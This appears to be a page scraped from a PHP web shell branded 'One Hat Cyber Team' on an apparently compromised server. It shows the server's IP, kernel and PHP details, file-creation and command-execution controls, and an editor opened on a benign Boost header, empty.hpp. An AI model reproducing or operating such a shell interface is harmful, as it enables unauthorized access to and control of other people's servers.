One Hat Cyber Team
Your IP :
216.73.217.53
Server IP :
104.21.79.98
Server :
Linux vps-14493116.nutrivittasaude.com.br 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
Server Software :
Apache
PHP Version :
8.3.31
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
self
/
root
/
usr
/
include
/
boost
/
vmd
/
Edit File:
empty.hpp
// (C) Copyright Edward Diener 2011-2015 // Use, modification and distribution are subject to the Boost Software License, // Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at // http://www.boost.org/LICENSE_1_0.txt). #if !defined(BOOST_VMD_EMPTY_HPP) #define BOOST_VMD_EMPTY_HPP #include <boost/vmd/detail/setup.hpp> #if BOOST_PP_VARIADICS /* The succeeding comments in this file are in doxygen format. */ /** \file */ /** \def BOOST_VMD_EMPTY(...) \brief Outputs emptiness. ... = any variadic parameters. The parameters are ignored. This macro is used to output emptiness ( nothing ) no matter what is passed to it. If you use this macro to return a result, as in 'result BOOST_VMD_EMPTY' subsequently invoked, you should surround the result with BOOST_VMD_IDENTITY_RESULT to smooth over a VC++ problem. */ #define BOOST_VMD_EMPTY(...) #endif /* BOOST_PP_VARIADICS */ #endif /* BOOST_VMD_EMPTY_HPP */
Simpan